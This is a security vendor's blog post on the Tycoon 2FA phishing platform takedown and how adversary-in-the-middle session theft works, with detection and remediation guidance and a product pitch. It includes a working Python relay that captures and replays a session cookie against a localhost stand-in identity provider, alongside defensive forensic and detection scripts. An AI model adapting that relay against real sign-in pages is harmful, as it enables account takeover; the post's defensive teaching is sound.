
Europol, TycoonMFA and a quiet month for phishing attacks
Author: Will
Published: Mar 5, 2026
Read time: 14 min
On March 4, 2026, a coordinated coalition led by Microsoft and Europol seized 330 domains forming the backbone of Tycoon 2FA - the phishing-as-a-service (PhaaS) platform responsible for an estimated 62% of all MFA-bypass phishing attempts blocked by Microsoft systems at its peak. Law enforcement agencies in Latvia, Lithuania, Portugal, Poland, Spain, and the United Kingdom executed simultaneous infrastructure seizures, while a U.S. District Court order from the Southern District of New York authorized Microsoft to take control of the platform's control panels and fraudulent login pages.
The operation represents the most significant disruption of adversary-in-the-middle (AitM) phishing infrastructure to date. For DFIR practitioners and security operations teams, this is a watershed moment — but not a conclusion. The underlying technique that powered Tycoon 2FA remains very much alive across a growing ecosystem of competing toolkits, and the operational playbook for investigating AitM-driven compromises has never been more critical.
This post examines what Tycoon 2FA was, how it worked at a technical level, what the takedown changes (and what it doesn't), and what DFIR teams should be doing right now to prepare for what comes next.
Tycoon 2FA: Anatomy of an AitM Phishing Platform
Tycoon 2FA emerged in August 2023 and quickly established itself as the dominant player in the PhaaS market. By early 2025, it accounted for roughly 76% of all detected AitM phishing incidents. The platform was subscription-based - sold through Telegram and Signal channels for as little as $120 for ten days of access, or $350 per month for a full web-based administration panel. That price point is significant: it placed sophisticated MFA-bypass capabilities within reach of threat actors who lacked the technical skill to build or operate such infrastructure independently.
The platform's primary developer has been identified as Saad Fridi, operating under the monikers "SaaadFridi" and "Mr_Xaad," reportedly based in Pakistan. TrendAI's intelligence collection efforts, running from late 2024 through November 2025, were instrumental in establishing this attribution. Legal action has been taken against Fridi and efforts to identify Tycoon 2FA affiliates remain ongoing.
At scale, the numbers are staggering. Europol confirmed the platform generated tens of millions of phishing emails per month, facilitated unauthorized access to nearly 100,000 organizations globally, including schools, hospitals, and public institutions (many of which used Strand to respond to the attacks), and is linked to approximately 96,000 distinct phishing victims since 2023, including over 55,000 Microsoft customers. Healthcare and education were disproportionately targeted.
How Tycoon 2FA Bypassed MFA: The Technical Chain
The core innovation of Tycoon 2FA — shared with all AitM phishing platforms — is that it does not attempt to crack, brute-force, or guess the second authentication factor. It relays it. The platform operated as a transparent reverse proxy positioned between the victim and the legitimate identity provider (primarily Microsoft 365 and Google Workspace). The attack chain proceeds as follows:
Step 1: Initial lure delivery. Victims receive phishing emails containing attachments or malicious links, commonly .svg, .pdf, .html, or .docx files, or SharePoint links sent from other legitimate but previously compromised organizations. Calendar and to-do list files also became increasingly popular toward the end of 2025.
Step 2: Credential relay. The phishing page renders a pixel-perfect replica of the legitimate login interface. When the victim enters their username and password, Tycoon immediately forwards these credentials to the real identity provider in real time. From the victim's perspective, the experience is indistinguishable from a normal login.
Step 3: MFA relay. The legitimate service responds with a standard MFA challenge - a push notification, SMS code, authenticator app prompt, or number-matching dialog. Tycoon proxies this challenge back to the victim's browser. The victim completes the MFA step, believing they are authenticating normally. The MFA prompt arrives through the normal, legitimate channel, such as the Microsoft Authenticator app, because the real identity provider genuinely issued it.
Step 4: Session cookie capture. Upon successful authentication, the identity provider issues its session cookies to the reverse proxy (for Entra ID, ESTSAUTH and ESTSAUTHPERSISTENT on login.microsoftonline.com; services behind it then set their own, such as FedAuth for SharePoint Online). Tycoon captures these cookies before forwarding the victim to a benign-looking landing page. The victim sees what looks like a normal login; the attacker now holds a fully authenticated session. Strand's tests also observed that pre-existing authentication sessions (for example, where users were already signed in to M365 online) could be captured without interaction: the simple act of visiting the malicious domain was sufficient to enable compromise.
Step 5: Session replay and persistence. The attacker replays the stolen session cookie from their own infrastructure, inheriting the victim's authenticated session without needing to re-enter credentials or satisfy any further MFA prompts. Critically, this access persists even if the victim subsequently changes their password - unless active sessions and tokens are explicitly revoked.
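The chain in steps 2 through 5, as an added example that is not Tycoon 2FA code and not part of the original post: a constructed stand-in identity provider and a relay proxy run in-process on localhost, the victim signs in through the relay with the real one-time code, and the attacker then replays the captured cookie directly against the identity provider. The users, password, OTP value and endpoints are all made up; only the cookie name ESTSAUTH mirrors the real Entra ID session cookie.

```python
# Added example (not Tycoon 2FA code, not from the post): a stand-in identity
# provider and an AitM relay running in-process on localhost, to show steps 2-5
# end to end. Everything here is constructed; the cookie name ESTSAUTH only
# mirrors the real Entra ID session cookie's name.
import http.client
import http.server
import secrets
import threading
import urllib.parse
from http.cookies import SimpleCookie

USERS = {"alice@example.test": "Winter2026!"}  # constructed credential store
OTP_CODE = "123456"                             # constructed: code shown by the victim's authenticator
SESSIONS = {}                                   # IdP side: cookie value -> user
CAPTURED = []                                   # relay side "operator panel": stolen name=value cookies


class FakeIdP(http.server.BaseHTTPRequestHandler):
    """Minimal identity provider: password + OTP in, session cookie out."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        ok = USERS.get(user) == form.get("pw", [""])[0] and form.get("otp", [""])[0] == OTP_CODE
        if not ok:
            self.send_response(401)
            self.end_headers()
            return
        token = secrets.token_hex(16)
        SESSIONS[token] = user                      # MFA really was completed, so a session is minted
        self.send_response(302)
        self.send_header("Set-Cookie", f"ESTSAUTH={token}; Path=/; HttpOnly; Secure")
        self.send_header("Location", "/mailbox")
        self.end_headers()

    def do_GET(self):
        cookies = SimpleCookie(self.headers.get("Cookie", ""))
        user = SESSIONS.get(cookies["ESTSAUTH"].value) if "ESTSAUTH" in cookies else None
        ok = self.path == "/mailbox" and user is not None
        self.send_response(200 if ok else 401)
        self.end_headers()
        if ok:
            self.wfile.write(user.encode())


def make_relay(idp_port):
    """The phishing site: forwards the victim's POST to the real IdP unchanged
    (steps 2-3) and copies every Set-Cookie it gets back (step 4)."""

    class Relay(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args):
            pass

        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length)
            upstream = http.client.HTTPConnection("127.0.0.1", idp_port)
            upstream.request("POST", self.path, body=body,
                             headers={"Content-Type": "application/x-www-form-urlencoded"})
            resp = upstream.getresponse()
            resp.read()
            set_cookies = resp.headers.get_all("Set-Cookie") or []
            CAPTURED.extend(sc.split(";", 1)[0] for sc in set_cookies)  # keep name=value only
            self.send_response(resp.status)
            for sc in set_cookies:
                self.send_header("Set-Cookie", sc)   # victim is still logged in, nothing looks wrong
            if resp.getheader("Location"):
                self.send_header("Location", resp.getheader("Location"))
            self.end_headers()
            upstream.close()

    return Relay


def _serve(handler):
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def _get(port, path, cookie):
    conn = http.client.HTTPConnection("127.0.0.1", port)
    conn.request("GET", path, headers={"Cookie": cookie})
    resp = conn.getresponse()
    status, body = resp.status, resp.read().decode()
    conn.close()
    return status, body


def run_demo():
    """Victim logs in through the relay; attacker replays the captured cookie (step 5)."""
    USERS["alice@example.test"] = "Winter2026!"
    idp = _serve(FakeIdP)
    relay = _serve(make_relay(idp.server_port))
    try:
        form = urllib.parse.urlencode({"user": "alice@example.test", "pw": "Winter2026!", "otp": OTP_CODE})
        conn = http.client.HTTPConnection("127.0.0.1", relay.server_port)
        conn.request("POST", "/login", body=form, headers={"Content-Type": "application/x-www-form-urlencoded"})
        victim_status = conn.getresponse().status
        conn.close()
        stolen = CAPTURED[-1]
        USERS["alice@example.test"] = "Spring2026!"   # victim resets password: no effect on the session
        replay_status, replayed_as = _get(idp.server_port, "/mailbox", stolen)
        SESSIONS.clear()                               # explicit session revocation is what ends access
        after_revoke, _ = _get(idp.server_port, "/mailbox", stolen)
    finally:
        idp.shutdown(); relay.shutdown(); idp.server_close(); relay.server_close()
    return {"victim_status": victim_status, "replay_after_password_reset": replay_status,
            "replayed_as": replayed_as, "after_revocation": after_revoke}


if __name__ == "__main__":
    print(run_demo())
```

The relay never sees or needs the second factor's secret; it only needs to sit on the path. Note the order of the last two steps: the password reset leaves the replayed cookie working, and only clearing the server-side session store stops it, which is the remediation point made later in this post.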
This is the fundamental point that DFIR teams must internalize: MFA was never designed to defend against session hijacking. Tycoon 2FA does not defeat MFA. It renders it irrelevant by operating at a layer above the authentication ceremony itself.
Infrastructure and Evasion
Tycoon 2FA's infrastructure was built on Node.js and PHP with Nginx or custom reverse proxies intercepting all HTTP/S traffic, including POST requests containing credentials and MFA responses. The platform's operational security was considerable:
Rapid domain rotation. Infrastructure shifted from static, high-entropy domains to short-lived FQDNs (often active for only 24–72 hours) spread across diverse TLDs, primarily hosted behind Cloudflare.
Anti-analysis measures. Phishing pages deployed heavily obfuscated and randomized JavaScript and HTML. The kit performed environment detection to identify automation tools, headless browsers, and interception proxies like Burp Suite. It blocked developer tools, keyboard shortcuts, and right-click context menus. Debugger timing detection identified active DevTools sessions.
Dynamic code generation. Nonfunctional dead code was injected to defeat signature-based detection and consistent fingerprinting attempts.
Operator telemetry. The administrative panel tracked valid and invalid sign-in attempts, MFA usage, and session cookie capture, with victim data organized by targeted service, browser, geolocation, and authentication status. Captured credentials and cookies could be downloaded directly or forwarded to Telegram in near-real time.
Geographic analysis of attacker replay activity - filtering out residential proxy and VPN infrastructure - showed login activity concentrated primarily in Nigeria (211 observed logins) and South Africa (62), with smaller volumes from the United States, Canada, Saudi Arabia, and Kenya.
What This Means for DFIR Teams
The takedown of Tycoon 2FA's infrastructure is operationally significant, but it does not eliminate the threat class. DFIR teams responding to business email compromise (BEC), account takeover, and identity-based intrusions should treat this moment as an inflection point for revisiting detection, investigation, and remediation workflows.
With that said, Strand observed a lull in the volume of phishing compromises (especially against non-US entities) in February 2026.
Immediate Forensic Priorities
For organizations that may have been compromised through Tycoon 2FA prior to the takedown, the investigation scope extends well beyond credential reset:
Session token audit and revocation. Identifying and revoking all active sessions for potentially compromised accounts is the single most critical remediation step. Password resets alone are insufficient: stolen session cookies and refresh tokens remain valid until explicitly revoked or expired. In Entra ID, revoke them with the Microsoft Graph revokeSignInSessions action (Revoke-MgUserSignInSession in the Graph PowerShell SDK) in addition to the password reset, and note that access tokens already issued keep working until they expire (typically around an hour) unless the resource enforces Continuous Access Evaluation. Entra ID sign-in logs and Google Workspace audit logs should then be examined for anomalous session creation, particularly sessions originating from locations inconsistent with the user's normal activity.
BEC follow-on activity. Tycoon 2FA was one of the most popular kits for facilitating BEC attacks. After gaining access, operators frequently used compromised mailboxes to launch invoice fraud, payroll redirection, and internal phishing campaigns through criminal-controlled "mule" accounts. Investigators should examine sent items, mail rules (especially auto-forwarding and auto-delete rules), and OAuth app registrations for indicators of persistence.
Browser forensic artifacts. Threat actors are getting better at covering their tracks and hard-deleting the initial phishing emails, so endpoint-level investigation is often required to establish root cause. Relevant Chrome artifacts live under AppData\Local\Google\Chrome\User Data\Default\: the cookie database (Cookies, or Network\Cookies in current versions), the session restore files (Current Session and Last Session, or the Sessions\ folder in current versions), and the History database. Firefox equivalents reside in AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite and places.sqlite (older profiles use *.default). Copy the databases before opening them, since a running browser holds them locked, and remember that Chrome stores cookie values encrypted: these artifacts establish when a user visited a phishing page and whether session cookies were set, not what the cookies contained.
Cloud audit trail analysis. Entra ID sign-in logs, Conditional Access evaluation results, and token issuance events should be correlated against known Tycoon 2FA infrastructure indicators. Look for sessions where the IP that completed the interactive, MFA-satisfied sign-in differs from the IP of later sign-ins in the same session, especially non-interactive sign-ins whose MFA result reads "MFA requirement satisfied by claim in the token": the attacker is riding the victim's session rather than authenticating, and this pattern is a strong indicator of session cookie replay.
Mimecast events should also be considered, as discussed in our recent threat intelligence advisory: https://www.strandintelligence.com/blog/threat-actors-using-mimecast-to-evade-m365-forensics
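The browser-artifact step above, as an added example that is not Strand's tooling: it merges Chrome's Cookies and History SQLite databases into one timeline, converts Chrome's WebKit timestamps (microseconds since 1601-01-01 UTC), suppresses hosts on a known-good list, and flags identity-provider-named cookies stored under some other host, which is what a proxy rewriting the IdP's Set-Cookie onto its own domain leaves behind. The sample databases are constructed in a temporary directory with only the columns used here (real files have many more), the lookalike domain docs-share.example and the allowlist are made up, and cookie values are deliberately never read.

```python
# Added example (not Strand tooling, not from the post): one timeline out of
# Chrome's Cookies and History databases. The sample databases are constructed
# below with only the columns this code reads; real files have many more.
import os
import sqlite3
import tempfile
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Constructed allowlist: the real IdP plus hosts the tenant expects to see.
KNOWN_HOSTS = {"login.microsoftonline.com", "outlook.office.com", "sharepoint.com"}
IDP_COOKIE_NAMES = ("ESTSAUTH", "ESTSAUTHPERSISTENT", "SID")


def webkit_to_dt(us):
    """Chrome stores times as microseconds since 1601-01-01 UTC; 0 means unset."""
    return WEBKIT_EPOCH + timedelta(microseconds=us) if us else None


def dt_to_webkit(dt):
    return int((dt - WEBKIT_EPOCH) / timedelta(microseconds=1))


def _known(host):
    host = host.lstrip(".")
    return any(host == k or host.endswith("." + k) for k in KNOWN_HOSTS)


def browser_timeline(cookies_db, history_db, start, end):
    """Events (time, kind, host, detail) between start and end for hosts that are
    not allowlisted. Cookie values are not read: Chrome encrypts them, and the
    point here is timing, not content."""
    lo, hi = dt_to_webkit(start), dt_to_webkit(end)
    events = []
    con = sqlite3.connect(history_db)
    for t, url in con.execute(
            "SELECT v.visit_time, u.url FROM visits v JOIN urls u ON u.id = v.url "
            "WHERE v.visit_time BETWEEN ? AND ?", (lo, hi)):
        host = urlsplit(url).hostname or ""
        if not _known(host):
            events.append((webkit_to_dt(t), "visit", host, url))
    con.close()
    con = sqlite3.connect(cookies_db)
    for t, host, name, httponly in con.execute(
            "SELECT creation_utc, host_key, name, is_httponly FROM cookies "
            "WHERE creation_utc BETWEEN ? AND ?", (lo, hi)):
        if not _known(host):
            events.append((webkit_to_dt(t), "cookie_set", host.lstrip("."),
                           f"{name} (HttpOnly={bool(httponly)})"))
    con.close()
    return sorted(events)


def suspicious_cookie_hosts(events):
    """IdP-named cookies stored under a host that is not the IdP: the trace of a
    proxy rewriting the provider's Set-Cookie onto its own domain."""
    return sorted({host for _, kind, host, detail in events
                   if kind == "cookie_set" and detail.split(" ")[0] in IDP_COOKIE_NAMES})


def build_sample_dbs():
    """Constructed data: a click on a lookalike domain at 09:02, cookies set by
    it shortly after, then the real IdP (allowlisted, so suppressed)."""
    d = tempfile.mkdtemp()
    t0 = datetime(2026, 2, 10, 9, 0, tzinfo=timezone.utc)

    def ts(minutes):
        return dt_to_webkit(t0 + timedelta(minutes=minutes))

    hist, cook = os.path.join(d, "History"), os.path.join(d, "Cookies")
    con = sqlite3.connect(hist)
    con.executescript(
        "CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT, last_visit_time INTEGER);"
        "CREATE TABLE visits(id INTEGER PRIMARY KEY, url INTEGER, visit_time INTEGER);")
    con.executemany("INSERT INTO urls VALUES (?,?,?,?)", [
        (1, "https://outlook.office.com/mail/", "Mail", ts(1)),
        (2, "https://docs-share.example/invoice/open?id=4471", "Shared document", ts(2)),
        (3, "https://login.microsoftonline.com/common/oauth2/authorize", "Sign in", ts(4)),
    ])
    con.executemany("INSERT INTO visits VALUES (?,?,?)", [(1, 1, ts(1)), (2, 2, ts(2)), (3, 3, ts(4))])
    con.commit(); con.close()
    con = sqlite3.connect(cook)
    con.execute("CREATE TABLE cookies(creation_utc INTEGER, host_key TEXT, name TEXT, is_httponly INTEGER)")
    con.executemany("INSERT INTO cookies VALUES (?,?,?,?)", [
        (ts(2.5), ".docs-share.example", "__cf_bm", 1),
        (ts(3), "docs-share.example", "ESTSAUTH", 1),        # IdP-named cookie on the lookalike host
        (ts(4), "login.microsoftonline.com", "ESTSAUTH", 1),  # the genuine one, suppressed by allowlist
    ])
    con.commit(); con.close()
    return cook, hist, t0, t0 + timedelta(minutes=10)


if __name__ == "__main__":
    cookies_db, history_db, start, end = build_sample_dbs()
    for when, kind, host, detail in browser_timeline(cookies_db, history_db, start, end):
        print(when.isoformat(), kind, host, detail)
    print("IdP-named cookies under non-IdP hosts:", suspicious_cookie_hosts(cookies_db and
          browser_timeline(cookies_db, history_db, start, end)))
```

Run it against copies of a user's profile by pointing browser_timeline at the real Cookies and History files with the start and end of the window in which the phishing email was delivered; the allowlist is the only thing to adapt per tenant.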
Detection Engineering Considerations
The AitM attack pattern creates characteristic forensic signals that detection teams can operationalize:
TLS fingerprint anomalies. Because AitM reverse proxies use the TLS stack of their implementation language (Go for Evilginx, Node.js or PHP for kits like Tycoon 2FA), the TLS client fingerprint presented to the identity provider differs from that of a real browser. JA3 or JA4 client fingerprinting can surface these discrepancies, with the caveat that only whoever terminates the identity provider's TLS sees that handshake: for a self-hosted IdP such as AD FS or Keycloak you can fingerprint clients yourself, while for Microsoft 365 or Google Workspace it is a signal the provider has to expose through its own risk detections.
Newly registered domain correlation. The vast majority of AitM phishing infrastructure operates on recently registered domains with short-lived certificates. DNS telemetry enriched with domain age data is a high-value detection signal.
Geographic session anomalies. Attackers must approximate the victim's location when replaying session cookies to avoid triggering risk-based authentication challenges. Detecting sessions that originate from residential proxy infrastructure or show subtle geographic inconsistencies (same city, different ASN) warrants investigation.
Conditional Access Policy gaps. Organizations that have not implemented token protection (https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-token-protection; currently limited to a defined set of clients and platforms, so check the scope in that documentation), continuous access evaluation (CAE), or device compliance requirements in their Conditional Access policies are disproportionately exposed to session replay attacks.
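The session-replay signals from the audit-trail and detection-engineering points above, as an added example that is not part of the original post: the logic groups sign-in records by user and session, takes the interactive sign-in that completed MFA as the anchor, and scores every later sign-in in that session that arrives from a different IP while reusing the MFA claim. The records and the IP enrichment table are constructed; field names only loosely follow an Entra ID sign-in log export (an assumption, so map them to your own export), and the MFA result strings are the shorthand "MFA completed" and the text Entra actually reports, "MFA requirement satisfied by claim in the token".

```python
# Added example (not from the post): session-replay heuristics run over
# constructed sign-in records. Field names loosely follow an Entra ID sign-in
# log export (assumption); the IP enrichment table is made up.
from collections import defaultdict
from datetime import datetime

# Constructed: in production this comes from a geo / ASN / proxy-reputation feed.
IP_INFO = {
    "203.0.113.10": {"asn": "AS64500", "city": "Manchester", "country": "GB", "residential_proxy": False},
    "203.0.113.77": {"asn": "AS64511", "city": "Manchester", "country": "GB", "residential_proxy": True},
    "198.51.100.5": {"asn": "AS64496", "city": "Lagos",      "country": "NG", "residential_proxy": False},
    "192.0.2.40":   {"asn": "AS64502", "city": "Leeds",      "country": "GB", "residential_proxy": False},
}

MFA_DONE = "MFA completed"                                       # constructed shorthand
MFA_CLAIM = "MFA requirement satisfied by claim in the token"   # wording as Entra reports it

SAMPLE_SIGNINS = [  # constructed records
    {"userPrincipalName": "alice@example.test", "sessionId": "s-1", "createdDateTime": "2026-02-10T09:03:00Z",
     "ipAddress": "203.0.113.10", "isInteractive": True, "mfaResult": MFA_DONE},
    {"userPrincipalName": "alice@example.test", "sessionId": "s-1", "createdDateTime": "2026-02-10T09:41:00Z",
     "ipAddress": "198.51.100.5", "isInteractive": False, "mfaResult": MFA_CLAIM},
    {"userPrincipalName": "bob@example.test", "sessionId": "s-2", "createdDateTime": "2026-02-10T08:10:00Z",
     "ipAddress": "192.0.2.40", "isInteractive": True, "mfaResult": MFA_DONE},
    {"userPrincipalName": "bob@example.test", "sessionId": "s-2", "createdDateTime": "2026-02-10T10:15:00Z",
     "ipAddress": "192.0.2.40", "isInteractive": False, "mfaResult": MFA_CLAIM},
    {"userPrincipalName": "carol@example.test", "sessionId": "s-3", "createdDateTime": "2026-02-11T13:00:00Z",
     "ipAddress": "203.0.113.10", "isInteractive": True, "mfaResult": MFA_DONE},
    {"userPrincipalName": "carol@example.test", "sessionId": "s-3", "createdDateTime": "2026-02-11T13:20:00Z",
     "ipAddress": "203.0.113.77", "isInteractive": False, "mfaResult": MFA_CLAIM},
]


def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def session_replay_findings(signins, ip_info=IP_INFO):
    """Per (user, sessionId): the first interactive sign-in that completed MFA is
    the anchor; each later sign-in from a different IP is scored against the
    anchor's network context. Same-IP follow-ups (bob) produce nothing."""
    sessions = defaultdict(list)
    for s in sorted(signins, key=lambda s: _ts(s["createdDateTime"])):
        sessions[(s["userPrincipalName"], s["sessionId"])].append(s)
    findings = []
    for (user, sid), evs in sessions.items():
        anchor = next((e for e in evs if e["isInteractive"] and e["mfaResult"] == MFA_DONE), None)
        if anchor is None:
            continue
        a = ip_info.get(anchor["ipAddress"], {})
        for e in evs:
            if e is anchor or e["ipAddress"] == anchor["ipAddress"]:
                continue
            i = ip_info.get(e["ipAddress"], {})
            reasons = ["ip_changed_within_session"]
            if e["mfaResult"] == MFA_CLAIM:
                reasons.append("mfa_claim_reused_not_reprompted")   # rode the session, did not re-auth
            if i.get("country") != a.get("country"):
                reasons.append("country_changed")
            elif i.get("city") == a.get("city") and i.get("asn") != a.get("asn"):
                reasons.append("same_city_different_asn")           # attacker approximating the victim's location
            if i.get("residential_proxy"):
                reasons.append("residential_proxy_egress")
            minutes = int((_ts(e["createdDateTime"]) - _ts(anchor["createdDateTime"])).total_seconds() // 60)
            findings.append({"user": user, "sessionId": sid, "anchor_ip": anchor["ipAddress"],
                             "replay_ip": e["ipAddress"], "minutes_after_mfa": minutes, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in session_replay_findings(SAMPLE_SIGNINS):
        print(f)
```

Two things in the output are worth attention: alice's session is replayed from another country 38 minutes after her MFA, which a country-based policy would catch, while carol's is replayed from the same city on a residential proxy, which is exactly the case that only the ASN comparison and proxy enrichment surface.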
The Broader AitM Ecosystem: Tycoon Is Not Alone
The technique that made Tycoon 2FA effective is not proprietary. It is a well-documented attack pattern implemented across a growing family of PhaaS toolkits. The takedown of Tycoon 2FA's infrastructure will likely accelerate migration to competing platforms.
Evilginx
Evilginx is the open-source ancestor of the modern AitM phishing ecosystem. Originally released in 2017 as a modified Nginx configuration, it was later rewritten in Go with its own HTTP and DNS server implementation. Evilginx introduced the concept of "phishlets" — modular, service-specific proxy configurations that can be authored for any target (Microsoft, Okta, LinkedIn, Google, and essentially any web application with cookie-based authentication).
While marketed as a penetration testing and red team tool, Evilginx's open-source availability means it is freely adopted by threat actors. It has been observed in campaigns attributed to the Star Blizzard APT group (linked to Russia's FSB) and in a significant 2025 campaign targeting 18 U.S. universities. Its modular architecture, support for custom evasion mechanisms, and active development community make it a persistent and evolving threat.
EvilProxy
Active since mid-2022 and sold through the Exploit and XSS cybercrime forums as well as Telegram, EvilProxy maintains approximately 280 active servers on average. Its appeal lies in its low barrier to entry — operators require minimal technical expertise to target Microsoft 365, Google, and other cloud platforms. EvilProxy accounted for roughly 8% of detected AitM phishing incidents in early 2025.
Mamba 2FA
Discovered in May 2024, Mamba 2FA emerged as a significant threat particularly targeting Microsoft 365 environments. Barracuda analysts detected a surge in Mamba 2FA activity in late 2025, accounting for close to 10 million attacks. Its pricing model mirrors the broader PhaaS market: basic services start around $120, with advanced features at approximately $250 per month.
The Next Wave
The PhaaS market is experiencing rapid innovation. Newer entrants observed in late 2025 and early 2026 include Sneaky 2FA (which uses browser-in-the-browser fake login windows and validates stolen credentials through legitimate Microsoft APIs), Whisper 2FA (a lightweight kit using AJAX-based exfiltration instead of traditional reverse proxies), and GhostFrame (first observed in September 2025, prioritizing code obfuscation and URL concealment). Barracuda's threat analysts recorded a doubling in the number of PhaaS kits in active use during 2025.
The takedown of the market leader will not shrink this ecosystem. It will redistribute it.
What Happens Next
Short-Term: Infrastructure Reconstitution
History suggests Tycoon 2FA's operators will attempt to rebuild. Johannes Ullrich, dean of research at the SANS Institute, noted that access brokers like Tycoon 2FA are typically less sensitive to domain takedowns than malware operators - they will need time to rebuild domain infrastructure, but the core platform codebase likely survives. The 57.6% reduction in phishing volume observed between November 2025 and January 2026 (coinciding with early-phase infrastructure seizures) demonstrates the operational impact, but it is almost certainly temporary.
The identification of the alleged primary developer creates legal and operational pressure, but the affiliate model means the operational knowledge is distributed. Affiliates who relied on Tycoon 2FA's infrastructure are already migrating — or building their own.
Medium-Term: Ecosystem Fragmentation
The PhaaS market will likely fragment further. Smaller, more operationally secure platforms may emerge, learning from the infrastructure patterns that enabled the Tycoon 2FA takedown. Expect to see increased use of bulletproof hosting, decentralized infrastructure models, and more aggressive domain rotation cycles.
Long-Term: The Authentication Problem Persists
The fundamental vulnerability that AitM phishing exploits - cookie-based session authentication following a one-time MFA ceremony - remains structurally present in the vast majority of enterprise identity architectures. Until phishing-resistant authentication methods and token protection achieve broad adoption, the attack surface persists regardless of which specific toolkit occupies market share.
Defensive Recommendations
For DFIR teams and security operations leadership, the Tycoon 2FA takedown should catalyze action across several fronts:
Deploy phishing-resistant MFA. FIDO2 security keys and passkeys use asymmetric public-key cryptography bound to a relying party ID. The browser only lets a page use a credential when the relying party ID matches the page's own origin (the RP ID must be the origin's host or a parent domain of it), and the authenticator signs over a hash of that RP ID together with client data that records the origin. A phishing domain therefore cannot obtain a usable assertion, however faithfully it proxies the pages, which makes AitM relaying technically ineffective. This is the single highest-impact control against the entire AitM phishing class.
Implement token protection and Continuous Access Evaluation. Token protection binds the sign-in session's refresh token to the device that obtained it, so a token replayed from attacker infrastructure is rejected (the original Token Binding proposal, RFC 8471, did this at the TLS-connection level; Entra's implementation uses a device-bound key and currently covers only supported clients and platforms). CAE lets resources such as Exchange Online and SharePoint Online reject access tokens in near real time when a critical event occurs (session revocation, password change, account disable, elevated user risk) or when the token is presented from an IP outside the tenant's named-location policy, instead of waiting for the token to expire.
Shorten session lifetimes. Reducing the validity window of session cookies limits the attacker's operational window after a successful capture. Balance usability against risk based on resource sensitivity.
Harden Conditional Access policies. Require device compliance, enforce named location restrictions, and implement sign-in risk policies that challenge or block authentication from anomalous contexts.
Invest in DNS-layer detection. Filtering newly registered domains, monitoring for domain lookalikes, and enriching DNS telemetry with registration age data provides early-warning capability against AitM infrastructure before phishing emails reach inboxes.
Operationalize AitM-specific detection rules. Build detection logic around TLS fingerprint anomalies, geographic session inconsistencies, residential proxy indicators, and OAuth app registration patterns that characterize post-compromise AitM activity.
Conduct AitM adversary simulations. Red team exercises using tools like Evilginx in controlled environments provide direct insight into organizational exposure and validate detection coverage against real AitM attack chains.
Invest in automated investigation and response capability. Phishing-as-a-service is not going away - the Tycoon 2FA takedown will displace threat actors briefly, not eliminate them, and the next generation of AitM kits is already emerging. When a compromise does occur, the critical question shifts from prevention to speed: how quickly can your team establish root cause, map the blast radius, and determine exactly what data was accessed or exfiltrated? Manual investigation workflows cannot keep pace with the volume and velocity of AitM-driven intrusions at scale. Strand Intelligence provides AI-powered digital forensics and incident response that automates the investigative heavy lifting - from initial triage through root cause analysis and data impact assessment - so your team can move from detection to definitive answers in hours, not weeks. Learn more at strandintelligence.com.
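The origin binding behind the phishing-resistant MFA recommendation above, as an added example that is not part of the original post: the client-side rule that stops a page from using a credential whose relying party ID does not match the page's origin, and the server-side checks on clientDataJSON and the RP ID hash that would reject a relayed assertion even if one were produced. The domains (example.test, login-example.test), the challenge and the authenticator data bytes are constructed; signature verification is left out on purpose, because the origin and RP ID checks are the part a relay cannot get past, and the public-suffix list consulted by real browsers is omitted as a simplification.

```python
# Added example (not from the post): the WebAuthn origin checks that make a
# FIDO2 / passkey assertion useless to an AitM relay. Constructed data; no
# signature math (that part is not what the relay breaks) and no public-suffix
# list (a simplification of the browser's real "valid domain" rule).
import base64
import hashlib
import json
from urllib.parse import urlsplit


def browser_allows_rp_id(rp_id, page_origin):
    """Client side: the RP ID must equal the page's host or be a dot-separated
    suffix of it, and the page must be a secure context. A lookalike domain
    asking for the real RP ID is refused before the authenticator is touched."""
    u = urlsplit(page_origin)
    host = u.hostname or ""
    if u.scheme != "https" and host != "localhost":
        return False
    return host == rp_id or host.endswith("." + rp_id)


def rp_verifies_assertion(client_data_json, authenticator_data, expected_origin, expected_challenge, rp_id):
    """Server side: the checks from the WebAuthn assertion procedure that need no
    key: type, challenge, origin recorded by the browser, and the RP ID hash the
    authenticator signed over (first 32 bytes of authenticatorData)."""
    cd = json.loads(client_data_json)
    if cd.get("type") != "webauthn.get":
        return False, "wrong_type"
    if cd.get("challenge") != expected_challenge:
        return False, "challenge_mismatch"
    if cd.get("origin") != expected_origin:
        return False, "origin_mismatch"
    if authenticator_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rp_id_hash_mismatch"
    return True, "ok"


def client_data(origin, challenge):
    """What the browser serializes into clientDataJSON for a get() call."""
    return json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin,
                       "crossOrigin": False}, separators=(",", ":"))


def demo():
    rp_id = "example.test"                                          # constructed relying party
    challenge = base64.urlsafe_b64encode(b"\x01" * 16).rstrip(b"=").decode()  # constructed
    # authenticatorData: rpIdHash (32) | flags UP|UV (1) | signCount (4)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + bytes([0x05]) + (0).to_bytes(4, "big")
    legit = rp_verifies_assertion(client_data("https://login.example.test", challenge),
                                  auth_data, "https://login.example.test", challenge, rp_id)
    # Relay case 1: phishing page requests the real RP ID; the browser refuses outright.
    browser_allows_on_phish = browser_allows_rp_id(rp_id, "https://login-example.test")
    # Relay case 2: suppose an assertion were somehow produced on the phishing origin and
    # proxied through; clientDataJSON still carries the origin the browser saw.
    relayed = rp_verifies_assertion(client_data("https://login-example.test", challenge),
                                    auth_data, "https://login.example.test", challenge, rp_id)
    return {"legit": legit, "browser_allows_on_phish": browser_allows_on_phish, "relayed": relayed}


if __name__ == "__main__":
    print(demo())
```

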